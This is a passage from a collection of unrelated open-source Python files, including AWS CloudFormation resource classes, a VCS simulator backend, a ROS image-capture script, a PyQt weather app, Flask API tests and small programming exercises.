(KeyUsage, False),\n 'SubjectAlternativeNames': (GeneralNameList, False),\n }\n\n\nclass ApiPassthrough(AWSProperty):\n props = {\n 'Extensions': (Extensions, False),\n 'Subject': (Subject, False),\n }\n\n\nclass Validity(AWSProperty):\n props = {\n 'Type': (validate_validity_type, True),\n 'Value': (integer, True),\n }\n\n\nclass Certificate(AWSObject):\n resource_type = \"AWS::ACMPCA::Certificate\"\n\n props = {\n 'ApiPassthrough': (ApiPassthrough, False),\n 'CertificateAuthorityArn': (str, True),\n 'CertificateSigningRequest': (str, True),\n 'SigningAlgorithm': (validate_signing_algorithm, True),\n 'TemplateArn': (str, False),\n 'Validity': (Validity, True),\n 'ValidityNotBefore': (Validity, False),\n }\n\n\nclass CertificateAuthorityActivation(AWSObject):\n resource_type = \"AWS::ACMPCA::CertificateAuthorityActivation\"\n\n props = {\n 'Certificate': (str, True),\n 'CertificateAuthorityArn': (str, True),\n 'CertificateChain': (str, False),\n 'Status': (str, False),\n }\n\n\nclass CrlConfiguration(AWSProperty):\n props = {\n 'CustomCname': (str, False),\n 'Enabled': (boolean, False),\n 'ExpirationInDays': (integer, False),\n 'S3BucketName': (str, False),\n }\n\n\nclass RevocationConfiguration(AWSProperty):\n props = {\n 'CrlConfiguration': (CrlConfiguration, False)\n }\n\n\nclass Subject(AWSProperty):\n props = {\n 'CommonName': (str, False),\n 'Country': (str, False),\n 'DistinguishedNameQualifier': (str, False),\n 'GenerationQualifier': (str, False),\n 'GivenName': (str, False),\n 'Initials': (str, False),\n 'Locality': (str, False),\n 'Organization': (str, 
False),\n 'OrganizationalUnit': (str, False),\n 'Pseudonym': (str, False),\n 'SerialNumber': (str, False),\n 'State': (str, False),\n 'Surname': (str, False),\n 'Title': (str, False),\n }\n\n\nclass CertificateAuthority(AWSObject):\n resource_type = \"AWS::ACMPCA::CertificateAuthority\"\n\n props = {\n 'KeyAlgorithm': (validate_key_algorithm, True),\n 'RevocationConfiguration': (RevocationConfiguration, False),\n 'SigningAlgorithm': (validate_signing_algorithm, True),\n 'Subject': (Subject, True),\n 'Tags': (Tags, False),\n 'Type': (validate_certificateauthority_type, True),\n }\n","repo_name":"suzhe96/ECE1779-Winter2021","sub_path":"insta/venv/lib/python3.8/site-packages/troposphere/acmpca.py","file_name":"acmpca.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26095101336","text":"import os\nimport logging\n\nfrom edalize.edatool import Edatool\n\nlogger = logging.getLogger(__name__)\n\n\nclass Vcs(Edatool):\n\n _description = \"\"\" Synopsys VCS Backend\n\nVCS is one of the \"Big 3\" simulators.\n\nExample snippet of a CAPI2 description file for VCS:\n\n.. code:: yaml\n\n vcs:\n vcs_options:\n # Compile-time options passed to the vcs command\n - -debug_access+pp\n - -debug_access+all\n run_options:\n # Run-time options passed to the simulation itself\n - -licqueue\n\"\"\"\n\n tool_options = {\n \"lists\": {\n \"vcs_options\": \"String\", # compile-time options (passed to VCS)\n \"run_options\": \"String\", # runtime options (passed to simulation)\n }\n }\n\n argtypes = [\"plusarg\", \"vlogdefine\", \"vlogparam\"]\n\n def _filelist_has_filetype(self, file_list, string, match_type=\"prefix\"):\n for f in file_list:\n if match_type == \"prefix\" and f.file_type.startswith(string):\n return True\n elif match_type == \"exact\" and f.file_type == string:\n return True\n return False\n\n def configure_main(self):\n def _vcs_filelist_filter(src_file):\n ft = src_file.file_type\n # XXX: C source files can be passed to VCS to be compiled into DPI\n # libraries; passing C sources together with RTL sources is a\n # workaround until we have proper DPI support\n # (https://github.com/olofk/fusesoc/issues/311).\n return (\n ft.startswith(\"verilogSource\")\n or ft.startswith(\"systemVerilogSource\")\n or ft == \"cSource\"\n or ft == \"cppSource\"\n )\n\n self._write_fileset_to_f_file(\n os.path.join(self.work_root, self.name + \".scr\"),\n include_vlogparams=True,\n filter_func=_vcs_filelist_filter,\n )\n\n plusargs = []\n if self.plusarg:\n for key, value in self.plusarg.items():\n plusarg = \"+\" + key\n if value != True:\n plusarg += \"=\" + self._param_value_str(value)\n plusargs.append(plusarg)\n\n vcs_options = self.tool_options.get(\"vcs_options\", [])\n\n (src_files, incdirs) = self._get_fileset_files(force_slash=True)\n if self._filelist_has_filetype(src_files, \"systemVerilog\", match_type=\"prefix\"):\n vcs_options.append(\"-sverilog\")\n\n if self._filelist_has_filetype(src_files, \"verilog2001\", match_type=\"exact\"):\n vcs_options.append(\"+v2k\")\n\n template_vars = {\n \"name\": self.name,\n \"vcs_options\": vcs_options,\n \"run_options\": self.tool_options.get(\"run_options\", []),\n \"toplevel\": self.toplevel,\n \"plusargs\": plusargs,\n }\n\n self.render_template(\"Makefile.j2\", \"Makefile\", template_vars)\n\n def run_main(self):\n args = [\"run\"]\n\n # Set plusargs\n if self.plusarg:\n plusargs = []\n for key, value in self.plusarg.items():\n plusargs += 
[\"+{}={}\".format(key, self._param_value_str(value))]\n args.append(\"EXTRA_OPTIONS=\" + \" \".join(plusargs))\n\n self._run_tool(\"make\", args)\n","repo_name":"olofk/edalize","sub_path":"edalize/vcs.py","file_name":"vcs.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"19"} +{"seq_id":"20304596898","text":"from pathlib import Path\n\nimport pytest\nfrom hamcrest import *\n\nfrom ilids.cli.mdb import export_all_tables, mdb_export_table\n\n\n@pytest.mark.sztr_files((\"SZTR.mdb\", \"mdb_file\"))\n@pytest.mark.parametrize(\n \"table,entries,columns\",\n [\n (\"CLIPDATA\", 3894, 5),\n (\"CLIPS\", 236, 5),\n (\"DATASTRUCTURE\", 19, 5),\n (\"LIBRARIES\", 1, 4),\n ],\n)\ndef test_export_table(mdb_file: Path, table, entries, columns):\n table_data = mdb_export_table(mdb_file, table)\n assert_that(len(table_data), is_(entries))\n assert_that(len(table_data.columns), is_(columns))\n\n\n@pytest.mark.sztr_files((\"SZTR.mdb\", \"mdb_file\"))\ndef test_export_all_tables(mdb_file: Path):\n tables_df = export_all_tables(mdb_file)\n assert_that(\n tables_df.keys(),\n contains_inanyorder(\"CLIPDATA\", \"CLIPS\", \"DATASTRUCTURE\", \"LIBRARIES\"),\n )\n","repo_name":"schallerala/unifr-master-ilids-alarms","sub_path":"tests/cli/test_mdb.py","file_name":"test_mdb.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7334807628","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(0, '/opt/installer/open_cv/cv_bridge/lib/python3/dist-packages/')\nsys.path.insert(1, '/usr/local/lib/python3.6/dist-packages/cv2')\nimport os\nimport datetime \nimport cv2\nimport rospy\nimport time \nimport argparse\nimport numpy as np\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--Object_Name', type=str, default='My_Object', help='Class name of training object.')\nFLAGS = parser.parse_args()\n\nday = str(datetime.datetime.now()).split(\" \")[0]\ntime = str(datetime.datetime.now()).split(\" \")[1]\ntime = time.split(\":\")[0] + \"_\" + time.split(\":\")[1] + \"_\" + time.split(\":\")[2].split(\".\")[0]\n\ncurrent_time = day + \"_\" + time + \"_\"\n\nObject_Name = FLAGS.Object_Name\n\nTrain_Data_Dir = os.path.dirname(os.path.realpath(__file__)) + '/Training_Data/' + \\\n current_time + '_' + Object_Name + '/'\n\nvis = True\n\nrgb_brdige = CvBridge()\ndepth_brdige = CvBridge()\nrgb_image = np.zeros((0,0,3), np.float32)\ndepth_image = np.zeros((0,0,1), np.float32)\ntemp_depth_img = np.zeros((0,0,1), np.float32)\n\ndef rgb_callback(Image):\n global rgb_image\n try:\n rgb_image = rgb_brdige.imgmsg_to_cv2(Image, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\ndef depth_callback(Image):\n global depth_image\n try:\n temp_depth_img = depth_brdige.imgmsg_to_cv2(Image, desired_encoding=\"passthrough\")\n except CvBridgeError as e:\n print(e)\n\n temp_depth_img = np.array(temp_depth_img, dtype=np.float32)\n \n cv2.normalize(temp_depth_img, temp_depth_img, 0, 1, cv2.NORM_MINMAX)\n\n depth_image = temp_depth_img.copy()\n \n\nif __name__ == '__main__':\n\n rospy.init_node('get_image_cornell', anonymous=True)\n\n rospy.Subscriber(\"/camera/color/image_raw\", Image, rgb_callback)\n rospy.Subscriber(\"/camera/aligned_depth_to_color/image_raw\", Image, depth_callback)\n\n take_picture_counter = 0\n\n while not 
rospy.is_shutdown():\n\n if rgb_image.shape != (0, 0, 3) and depth_image.shape != (0, 0, 1):\n\n if vis:\n cv2.namedWindow(\"rgb_result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"rgb_result\", rgb_image)\n cv2.waitKey(1)\n\n cv2.namedWindow(\"depth_result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"depth_result\", depth_image)\n cv2.waitKey(1)\n\n if cv2.waitKey(33) & 0xFF == ord('s'):\n\n if not os.path.exists(Train_Data_Dir):\n os.makedirs(Train_Data_Dir)\n \n print(\"============================\")\n \n objct_number = \"9\"\n\n if take_picture_counter<10:\n serial_number = objct_number + \"10\" + str(take_picture_counter)\n\n elif take_picture_counter<100:\n serial_number = objct_number +\"1\" + str(take_picture_counter)\n\n else:\n serial_number = objct_number + str(take_picture_counter+100)\n print(\"take_picture_counter \", take_picture_counter)\n \n rgb_name = str(Train_Data_Dir + \"pcd\" + serial_number + \"r\" + \".png\")\n cv2.imwrite(rgb_name, rgb_image)\n print(\"[Save] \", rgb_name)\n\n depth_name = str(Train_Data_Dir + \"pcd\" + serial_number + \"d\" + \".png\")\n #相机采集的深度图是 32 位的浮点数。经bridge.imgmsg_to_cv2(msg, '32FC1')转换得到是以米为单位的深度数值。\n #而cv2.imwrite()写入的则是 0-255 的数值,因此深度值都被取整了,导致直接保存的图片全黑了\n cv2.imwrite(depth_name, depth_image*255)\n print(\"[Save] \", depth_name)\n\n #save .tiff\n depth_name_tiff = str(Train_Data_Dir + \"pcd\" + serial_number + \"d\" + \".tiff\")\n cv2.imwrite(depth_name_tiff, depth_image)\n print(\"[Save] \", depth_name_tiff)\n\n print(\"============================\")\n\n take_picture_counter += 1\n \n else:\n pass\n\n cv2.destroyAllWindows()","repo_name":"SamKaiYang/grcnn_rgb","sub_path":"get_image/script/get_image_cornell.py","file_name":"get_image_cornell.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"71408291940","text":"from weatherwindow import WeatherWindow, WeatherDataManager\r\nfrom PyQt6.QtCore import Qt\r\nfrom PyQt6.QtGui import QFont\r\nfrom PyQt6.QtWidgets import ( \r\n QMainWindow, \r\n QVBoxLayout,\r\n QPushButton,\r\n QWidget,\r\n QLabel,\r\n QLineEdit,\r\n QSizePolicy,\r\n QSpacerItem,\r\n QMessageBox,\r\n)\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n \"\"\"\r\n Main window of the WeatherApp.\r\n\r\n Attributes\r\n ----------\r\n city_line_edit : QLineEdit\r\n Line edit for entering the city name.\r\n\r\n Methods\r\n -------\r\n __init__()\r\n Initialize the MainWindow.\r\n open_weather_window() -> WeatherWindow\r\n Open the WeatherWindow with weather information for the entered city.\r\n\r\n \"\"\"\r\n \r\n def __init__(self) -> None:\r\n \"\"\"\r\n Initialize the MainWindow.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n \r\n super().__init__()\r\n self.setWindowTitle(\"WeatherApp\")\r\n\r\n # MainWindow elements:\r\n font = QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n title_label = QLabel(\"WEATHER\")\r\n title_label.setFont(font)\r\n title_label.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n self.city_line_edit = QLineEdit()\r\n\r\n city_label = QLabel(\"Enter a city:\")\r\n self.weather_button = QPushButton(\"View weather\")\r\n self.weather_button.clicked.connect(self.open_weather_window)\r\n\r\n # Layout.\r\n layout = QVBoxLayout()\r\n spacer_top = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, \r\n QSizePolicy.Policy.Expanding)\r\n layout.addItem(spacer_top)\r\n layout.addWidget(title_label)\r\n layout.addWidget(city_label)\r\n layout.addWidget(self.city_line_edit)\r\n 
layout.addWidget(self.weather_button)\r\n spacer_bottom = QSpacerItem(20, 40, QSizePolicy.Policy.Minimum, \r\n QSizePolicy.Policy.Expanding)\r\n layout.addItem(spacer_bottom)\r\n layout.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n\r\n widget = QWidget()\r\n widget.setLayout(layout)\r\n self.setCentralWidget(widget)\r\n\r\n\r\n def open_weather_window(self) -> None:\r\n \"\"\"\r\n Open the WeatherWindow with weather information for the entered city.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n city = self.city_line_edit.text()\r\n if not WeatherDataManager.is_valid_city(city):\r\n QMessageBox.critical(self, \"Error\", \"The city name is not valid.\")\r\n return\r\n\r\n WeatherDataManager.save_info(city)\r\n self.weather_window = WeatherWindow(city)\r\n self.city_line_edit.clear()\r\n self.weather_window.show()\r\n self.weather_window.exec()\r\n","repo_name":"PabloGradolph/WeatherApp","sub_path":"src/weather/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18619720812","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\ndf = pd.read_csv('new.csv', encoding = 'cp1251', delimiter=';', index_col=False)\n\nbrands = df['Бренд'].unique()\n\nfor brand in brands:\n file_name = brand + \".csv\"\n new_files = df[df['Бренд']==brand]\n new_files.to_csv(file_name, index=False, encoding='cp1251')\n\n\n","repo_name":"alex-qwerty/csv_split","sub_path":"Csv_read.py","file_name":"Csv_read.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18265003838","text":"\"\"\"Tests area codes\"\"\"\n\nimport pytest\n\n\ndef test_url():\n from covid.data import AreaCodeData\n\n config = {\n \"AreaCodeData\": {\n \"input\": \"json\",\n \"address\": \"https://services1.arcgis.com/ESMARspQHYMw9BZ9/arcgis/rest/services/LAD_APR_2019_UK_NC/FeatureServer/0/query?where=1%3D1&outFields=LAD19CD,FID&returnGeometry=false&returnDistinctValues=true&orderByFields=LAD19CD&outSR=4326&f=json\",\n \"format\": \"ons\",\n \"output\": \"processed_data/processed_lad19cd.csv\",\n \"regions\": [\"E\"],\n },\n }\n\n df = AreaCodeData.process(config)\n\n print(df)\n","repo_name":"chrism0dwk/covid19uk","sub_path":"covid19uk/data/area_code_test.py","file_name":"area_code_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"70080411300","text":"first_side=int(input())\nsecond_side=int(input())\nthird_side=int(input())\n\ncondition_1=((first_side + second_side) > third_side)\ncondition_2=((second_side + third_side) > first_side)\ncondition_3=((third_side + first_side) > second_side)\n\nif (condition_1 and condition_2) and condition_3:\n print(\"It's a Triangle\")\nelse:\n print(\"It's not a Triangle\")","repo_name":"BhavanDevOps/Full-Stack-Projects","sub_path":"Python Projects/Valid Triangle - 2.py","file_name":"Valid Triangle - 2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"39739222851","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport copy\n\ndef sens_plots(ffc_data, rh_data):\n # Averge each FFC metric across the POR.\n for model in ffc_data:\n model['ffc_metrics'] = model['ffc_metrics'].apply(pd.to_numeric, 
errors='coerce')\n model['ffc_metrics'] = model['ffc_metrics'].mean(axis=1)\n \n # Normalize metric values across all models. \n ffc_data_norm = copy.deepcopy(ffc_data)\n metrics = ffc_data[0]['ffc_metrics'].index\n for metric in metrics:\n max_metric = ffc_data[0]['ffc_metrics'][metric] # can pick any starting val in dataset and test all others against it for min/max\n min_metric = ffc_data[0]['ffc_metrics'][metric] \n for model in ffc_data_norm:\n if model['ffc_metrics'][metric] is None:\n continue\n elif model['ffc_metrics'][metric] > max_metric:\n max_metric = model['ffc_metrics'][metric]\n elif model['ffc_metrics'][metric] < min_metric:\n min_metric = model['ffc_metrics'][metric]\n \n for index, model in enumerate(ffc_data_norm):\n ffc_data_norm[index]['ffc_metrics'][metric] = (model['ffc_metrics'][metric] - min_metric)/(max_metric - min_metric)\n # Group together all values for each metric (across models)\n dT_min = []\n dT_mid = []\n dT_min_names = ['SACSMA_DT1_DP1_DI0.0', 'SACSMA_DT2_DP1_DI0.0', 'SACSMA_DT3_DP1_DI0.0', 'SACSMA_DT4_DP1_DI0.0', 'SACSMA_DT5_DP1_DI0.0']\n dT_mid_names = ['SACSMA_DT1_DP1.1_DI0.6', 'SACSMA_DT2_DP1.1_DI0.6', 'SACSMA_DT3_DP1.1_DI0.6', 'SACSMA_DT4_DP1.1_DI0.6', 'SACSMA_DT5_DP1.1_DI0.6']\n for model_index, model in enumerate(ffc_data_norm):\n if model['gage_id'] in dT_min_names:\n dT_min.append(ffc_data[model_index])\n elif model['gage_id'] in dT_mid_names:\n dT_mid.append(ffc_data[model_index])\n \n # Plot: a line for each ffc metric, low PI dT (20 lines, 6 pts each)\n fig, ax = plt.subplots()\n # start with low PI dT (all blue lines)\n # for each metric, form a line from the six models\n for metric in metrics:\n line = []\n for model in dT_min:\n line.append(model['ffc_metrics'][metric])\n x = range(len(line))\n ax.scatter(x, line, color='orange', alpha=0.5)\n z = np.polyfit(x, line, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x),'-', color='orange')\n\n line_mid = []\n for model in dT_mid:\n line_mid.append(model['ffc_metrics'][metric])\n x = range(len(line_mid))\n ax.scatter(x, line_mid, color='blue', alpha=0.5)\n z = np.polyfit(x, line_mid, 1)\n p = np.poly1d(z)\n plt.plot(x, p(x),'-', color='blue')\n # plt.show()\n\n # Create summary table of extreme ends of sensitivity analysis\n sens_summary = {}\n # sens_summary_names = ['SACSMA_DT0_DP1_DI0.0', 'SACSMA_DT5_DP1_DI0.0', 'SACSMA_DT0_DP1.3_DI0.0', 'SACSMA_DT0_DP1_DI1.0'] # models at far ends of sensitivity\n sens_summary_names = ['SACSMA_DT0_DP1_DI0.0', 'SACSMA_DT1_DP0.8_DI0.2', 'SACSMA_DT2_DP0.9_DI0.4', 'SACSMA_DT3_DP1.1_DI0.6', 'SACSMA_DT4_DP1.2_DI0.8', \n 'SACSMA_DT5_DP1.3_DI1.0'] # step-wise combination models\n for model_index, model in enumerate(ffc_data):\n if model['gage_id'] in sens_summary_names:\n sens_summary[model['gage_id']] = model['ffc_metrics']\n df = pd.DataFrame(sens_summary)\n df.to_csv('data_outputs/sensitivity_summary_combo_mods.csv')\n import pdb; pdb.set_trace()\n # same plot for mid PI dT\n return \n ","repo_name":"NoellePatterson/climate_change_research","sub_path":"sensitivity_plots.py","file_name":"sensitivity_plots.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3041043107","text":"# basic tests for the functionality of the api\n\nimport os \nimport unittest\nimport sqlalchemy\nfrom application import app, db, Food, Category\n\nTEST_DB = \"test.db\"\n\nclass ModelFunctionality(unittest.TestCase):\n\t@classmethod\n\tdef setUpClass(self):\n\t\t# 
configurations\n\t\tapp.config[\"TESTING\"] = True\n\t\tapp.config[\"DEBUG\"] = False\n\t\tapp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + TEST_DB\n\t\n\t\tdb.drop_all()\n\t\tdb.create_all()\n\n\tdef tearDown(self):\n\t\tdb.session.rollback()\n\t\tfor category in Category.query.all():\n\t\t\tdb.session.delete(category)\n\t\t\tdb.session.commit()\n\n\t\tfor food in Food.query.all():\n\t\t\tdb.session.delete(food)\n\t\t\tdb.session.commit()\n\n\tdef test_category_object_exists(self):\n\t\trice_based = Category(name=\"rice_based\")\n\t\trice_based.save()\n\t\trice_based = Category.query.filter_by(name=\"rice_based\").one()\n\t\tself.assertIsInstance(rice_based, Category)\n\t\tself.assertEqual(\"rice_based\", rice_based.name)\n\n\tdef test_category_object_not_constructed_well(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\trice_based = Category()\n\t\t\trice_based.save()\n\n\tdef test_category_object_is_deleted(self):\n\t\tbean_based = Category(name=\"bean_based\")\n\t\tbean_based.save()\n\t\tbean_based = Category.query.filter_by(name=\"bean_based\").one()\n\t\tbean_based.remove()\n\n\t\tself.assertIsNone(Category.query.filter_by(name=\"bean_based\").first())\n\t\tself.assertEqual(0, len(Category.query.all()))\n\n\tdef test_category_is_unique(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tdrinks = Category(name=\"drinks\")\n\t\t\tdrinks.save()\n\t\t\twater = Category(name=\"drinks\")\n\t\t\twater.save()\n\n\tdef test_food_object_exists(self):\n\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\n\t\tfood.save()\n\t\tfood = Food.query.filter_by(name=\"jollof\").one()\n\t\tself.assertIsInstance(food, Food)\n\t\tself.assertEqual(\"jollof\", food.name)\n\n\tdef test_food_object_not_constructed_well(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1)\n\t\t\tfood.save()\n\n\n\tdef test_food_object_is_deleted(self):\n\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\tfood.save()\n\t\tjollof = Food.query.filter_by(name=\"jollof\").one()\n\t\tjollof.remove()\n\n\t\tself.assertIsNone(Category.query.filter_by(name=\"bean_based\").first())\n\t\tself.assertEqual(0, len(Category.query.all()))\n\n\tdef test_food_is_unique(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\tfood.save()\n\n\t\t\tdish = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\tdish.save()\n\n\nclass ApiFunctionality(unittest.TestCase):\n\n\t@classmethod\n\tdef setUpClass(self):\n\t\t# configurations\n\t\tapp.config[\"TESTING\"] = True\n\t\tapp.config[\"DEBUG\"] = False\n\t\tapp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + TEST_DB\n\t\tself.app = app.test_client()\n\t\tdb.drop_all()\n\t\tdb.create_all()\n\n\n\t\tself.FOOD_ITEM = \"soy_milk\"\n\t\tself.CATEGORY = \"beverages\"\n\t\tself.SINGLE_FOOD_URL = \"/api/foods/\" + self.FOOD_ITEM\n\t\tself.FOOD_BY_CATEGORY_URL = \"/api/food_category/\" + self.CATEGORY\n\t\tself.ALL_FOODS_URL = 
\"/api/foods\"\n\n\t\tcategory = Category(name=self.CATEGORY)\n\t\tcategory.save()\n\t\tfood = Food(name=self.FOOD_ITEM, url=\"url\", category_id=1, \n\t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\",\n\t\t\tfat=\"678\", sodium=\"12\")\n\t\tfood.save()\n\n\tdef test_index(self):\n\t\tresponse = self.app.get(\"/\", content_type=\"html/text\")\n\t\tself.assertEqual(response.status_code, 200)\n\t\t\n\tdef test_single_food_request(self):\n\t\tresponse = self.app.get(self.SINGLE_FOOD_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIn(self.FOOD_ITEM.encode(), response.data)\n\n\tdef test_bad_single_food_request(self):\n\t\tresponse = self.app.get(self.SINGLE_FOOD_URL + \"bleh bleh\")\n\t\tself.assertEqual(response.status_code, 404)\n\t\t\n\tdef test_category_request(self):\n\t\tresponse = self.app.get(self.FOOD_BY_CATEGORY_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIn(self.CATEGORY.encode(), response.data)\n\n\tdef test_bad_category_request(self):\n\t\tresponse = self.app.get(self.FOOD_BY_CATEGORY_URL + \"blehbleh\")\n\t\tself.assertEqual(response.status_code, 404)\n\n\tdef test_all_foods_request(self):\n\t\tresponse = self.app.get(self.ALL_FOODS_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIsNotNone(response.data)\n\n\nif __name__ == \"__main__\":\n\tunittest.main()","repo_name":"Thompsonmina/Nigerian-Foods-Api","sub_path":"test_basics.py","file_name":"test_basics.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"23875405154","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n\r\n# 문제정리\r\n # 1.현재 칸이 청소되지 않은 경우 현재 칸 청소(방문 처리)\r\n # 2.주변 4칸이 청소할 곳이 없는 경우\r\n # 1.바라보는 방향에서 후진 가능하면(뒤쪽 벽x) 한칸 후진하고 1번 반복\r\n # 2. 바라보는 방향에서 뒤쪽이 벽이면 작동 멈춤\r\n # 3. 주변 4칸중 청소할 곳이 있는 경우\r\n # 1. 로봇 청소기를 반시계 방향으로 먼저 회전(ok)\r\n # 2. 앞쪽이 빈칸인 경우 한칸 전진 (ok)\r\n # 3. 1번 복귀 (ok)\r\n# 아이디어 BFS\r\n # 0 = 청소 안한 빈칸\r\n # 1 = 벽\r\n # 위 순서대로 돌리면서 청소한 칸 갯수 세주기\r\n # 로봇청소기가 방향을 갖고있다. -> 바라보는 방향을 계속 인지해야한다.\r\n\r\n\r\nN,M = list(map(int,input().split())) # 가로 세로 \r\nstartX,startY,direction = list(map(int,input().split())) # 시작점,방향\r\n# 방향 - > 0 : 북 1 : 동 2 : 남 3 : 서\r\n\r\nboard = [list(map(int,input().split())) for _ in range(N)]\r\n\r\ncnt = 0 # 정답 출력할 변수 == 청소하는 칸의 개수\r\n\r\n# 북 동 남 서\r\ndx = [-1,0,1,0] \r\ndy = [0,1,0,-1]\r\nx,y = startX,startY\r\n\r\nwhile True :\r\n # 최초 로봇청소기의 위치에서, 청소되지 않은 칸.\r\n if board[x][y] == 0 : # 1번 연산\r\n board[x][y] = 10 # 청소된 칸.\r\n cnt += 1\r\n unCleanedRoom = False\r\n nextDirection = False\r\n for i in range(4) :\r\n nx,ny = x+dx[i],y+dy[i]\r\n if board[nx][ny] == 0 : # 청소할 칸이 있따.\r\n unCleanedRoom = True\r\n break\r\n if unCleanedRoom == True : # 청소 안 된 빈 칸 있다.\r\n #반시계 회전.\r\n # 북 -> 서 0 -> 3\r\n # 서 - 남 3 -> 2\r\n # 남 -> 동 2 -> 1\r\n # 동 -> 북 1 -> 0\r\n if direction == 0 : nextDirection = 3\r\n else : nextDirection = direction - 1\r\n direction = nextDirection # 방향 바꿈\r\n nx,ny = x+dx[direction],y+dy[direction] # 전진\r\n if board[nx][ny] == 0 : # 청소할 수 있는 경우.\r\n x,y = nx,ny # 진짜로 전진한다.\r\n continue\r\n else : # 사방이 다 청소된 상태\r\n nx,ny = x-dx[direction],y-dy[direction] # 바라보는 방향 기준 한칸 후진한 좌표\r\n if board[nx][ny] != 1 : # 후진한 칸이 벽이 아니라면\r\n x,y = nx,ny # 진짜로 후진한다.\r\n continue # 다시 1번 수행으로 돌아간다.\r\n else : break # 후진을 할수 없다면\r\n \r\nprint(cnt)","repo_name":"wooryjoon/algorithms","sub_path":"백준/Gold/14503. 
로봇 청소기/로봇 청소기.py","file_name":"로봇 청소기.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"17924974479","text":"# receives the x and y coordinates of a point\n# returns whether it is inside or outside the gray region\n# region: https://panda.ime.usp.br/aulasPython/static/aulasPython/exercicios/ex81a.html\n\ndef dentro(x,y):\n    if x < 0: x = - x\n    \n    if (y > 5 and y < 6) and (x > 2 and x < 3): return \"dentro\"\n    elif ((y >= 8 or y <= 0 or x >= 5)\n    or ((y >= 4 and y <= 7) and (x >= 1 and x <=4))\n    or ((y >= 1 and y <= 2) and (x <= 3))): \n        return \"fora\"\n    else: return \"dentro\"\n\nx = float(input())\ny = float(input())\n\nprint(dentro(x,y))\n","repo_name":"deboraprudencio/python","sub_path":"outros/ponto-regiao.py","file_name":"ponto-regiao.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7521192258","text":"import csv\r\nfrom ClasePlanAhorro import PlanAhorro\r\ndef LeerArchivo(Lista):\r\n    archivo=open(\"C:\\\\Users\\\\augus\\\\Downloads\\\\Nueva carpeta\\\\Ejer5\\\\planes(1).csv\")\r\n    reader=csv.reader(archivo,delimiter=\";\")\r\n    for i in reader:\r\n        cod=i[0]\r\n        mod=i[1]\r\n        vers=i[2]\r\n        val=i[3]\r\n        